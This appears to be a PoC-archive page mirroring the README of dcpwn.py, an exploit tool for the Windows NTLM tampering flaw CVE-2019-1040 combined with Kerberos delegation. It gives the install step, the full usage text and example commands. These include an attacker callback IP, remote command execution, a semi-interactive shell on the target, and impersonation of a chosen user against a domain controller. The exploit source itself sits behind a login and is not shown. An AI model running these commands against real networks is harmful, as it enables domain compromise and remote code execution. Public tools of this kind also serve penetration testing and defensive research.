Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-1040 PoC — Windows NTLM Tampering Vulnerability

Source
https://github.com/Ridter/CVE-2019-1040-dcpwn
Associated Vulnerability
Title:Windows NTLM Tampering Vulnerability (CVE-2019-1040)
Description:A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature. The update addresses the vulnerability by hardening NTLM MIC protection on the server-side.
Description
CVE-2019-1040 with Kerberos delegation
Readme
# CVE-2019-1040-dcpwn

Great writeup! [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) .

So, I wrote dcpwn.py for easy to use.

## Requirements
These tools require [impacket](https://github.com/SecureAuthCorp/impacket). You can install it from pip
```
pip install impacket
```

## Usage
```
usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                [--smb-port [destination port]] --callback-ip CALLBACK_IP
                --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                [--impersonate IMPERSONATE] -t Target [-share SHARE]
                [--command [COMMAND [COMMAND ...]]] [--debug]

CVE-2019-1040 with Kerberos delegation

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  --callback-ip CALLBACK_IP
                        Attacker hostname or IP
  --ldaps LDAPS         Hostname or ldaps server
  --dc-ip DC_IP         Domain controller ip address
  --timeout TIMEOUT     timeout in seconds
  --impersonate IMPERSONATE
                        target username that will be impersonated (thru
                        S4U2Self) for quering the ST. Keep in mind this will
                        only work if the identity provided in this scripts is
                        allowed for delegation to the SPN specified
  -t Target, --target Target
                        Hostname/IP of the target server
  -share SHARE          share where the output will be grabbed from (default
                        ADMIN$)
  --command [COMMAND [COMMAND ...]]
                        command to execute at the target. If empty it will
                        launch a semi-interactive shell
  --debug               Enable debug output
```

example:
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target
```
![](https://blogpics-1251691280.file.myqcloud.com/imgs/20190618200631.png)

If you  want to execute some command like cmd.exe.  use `--command`

example:
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
```


If you  want to impersonate specified user,  use `--impersonate`
```
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →